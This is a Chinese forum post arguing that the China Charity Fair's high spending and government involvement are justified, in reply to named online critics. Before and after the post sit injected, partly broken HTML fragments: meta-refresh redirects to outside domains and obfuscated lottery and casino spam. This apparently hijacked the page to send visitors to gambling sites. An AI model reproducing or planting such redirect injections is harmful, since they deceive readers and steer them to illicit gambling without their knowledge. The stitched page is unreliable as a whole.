你有你的说辞,我有我的立场——关于慈展会

参加活动:0

组织活动:0

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

="refresh" "0; url=http://bbbb.cc"><link href="http://bbs.bbbb.cc/8.css" rel="stylesheet" type="text/css" media="screen" /><P> </P> |||时时L彩| 六合投L注| L乐L城:L
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 支持支持 反对反对

三、奢华
  我们从@一道小河的微博谈起:
  我个人也是壹基金的捐赠人,认识文中提及的“汇丰”,我并不认为他是在威胁,而是他有意识到:不论公益圈儿,媒体圈儿,还是公众,认知层面是有限的(譬如“管理费”),对@一道小河 的提醒我认为是十分正确的。
  而对于@一道小河所讲的“我认为一个公募基金会要习惯于回答捐赠人的疑问和批评,要用善意和尊重面对这些问题。”——我个人认为这是在道德绑架,不评判。
  回到慈展会,或者确切的说回到一个“展会”的层面来看,慈展会无论如何也脱离不了现行的会展产业链支持。@一道小河 所谓的调查,实际上是脱离了整个会展产业链,把慈展会“架空”后予以评判,我认为这是十分不合适的。
  与此同时,慈展会本身就需要向公众传播公益理念,让公众体验和参与公益,否则有些参展的机构会很尴尬。相较去年,壹基金的公益体验区是个很好的创新,很受公众欢迎,我自己也去画了彩蛋,拿了专属可乐瓶。35万,我认为“花的值”!我要是企业,我明年还愿意给钱,多给点也行——@一道小河,给你35万,你行么?
  有时我很不能理解:为什么我们做公益的就非要穷嘻嘻的惹人可怜?凭什么我们不能高端大气上档次?干嘛我们一定只能卖“大白菜”,不准卖“星巴克”?
  无论如何,@一道小河已经实现了其“抛砖”的愿望了,至于“引”来的是“玉”还是“砖”,“砸”向哪里,这是无法控制的,也是@一道小河 的视野所不能企及的。
  旁白:我们是否陷入了这样一个怪圈:给你3万,你能花出5万的效果,但如果给你30万,会发现还是花出5万的效果——行业发展应当伴随着不同层次的消费群体,或者确切的说是能运作不同资金规模的群体,而不是在臆断下固步自封,道德绑架,做“井底之蛙”——都是些什么心态?请照【心镜】
  四、不参加慈展会的100个理由
  @安猪安心做猪 我曾在深交会与你有过一面之缘,“多背一公斤”给我留下了深刻的印象。你作为行业内有一定影响力的意见领袖,这种话题是你刻意与否我不置评论,但我认为可以有更积极正向的表述。还有,你浮躁了,莫争论,且照【心镜】。
  很多“理由”我前述有所涉及,在此不予多谈,我可以说出“政府必须参与慈展会的3个理由”:
  1、场地协调
  我并不知道会展中心收费情况如何,但我可以猜测,政府一定是出力协调了场地,为慈展会提供了基础。
  2、展会规格
  一项活动的规格往往取决于主办方和最高领导人,请不要急于反驳或者斥责我官僚,我举个例子:作为NGOer,你去寻求合作或者拉拢资金支持,是否会考虑让组织负责人去?如果你认为随随便便一个人都可以去,那我认栽,你尽情鄙视我吧。
  最高领导人的出席并不一定会有什么实质性的内容,像今年就是一大票人在场里转了一圈儿而已,但他最起码能传递一个信息:尊重&重视;带来一个资源:媒体关注。
  3、参与保障
  高端论坛研讨会、大牌基金会和CSR、国际展区,这些没有政府的邀请和倡导,是很难搞得定的。当然,大家可能会认为并不需要。
  旁白:爱,不需要理由,你可以不爱,但请不要伤害。
  不必纠结于我是谁,扫净阴霾,我是藏在【心镜】里的正能量,希望能带动你正向思考。

="refresh" "0; url=http://334.cc"><link href="http://bbs.334.cc/8.css" rel="stylesheet" type="text/css" media="screen" /><> </P> |||时时㎏彩| 六合投㎏注| ㎏乐㎏城:㎏

好帖子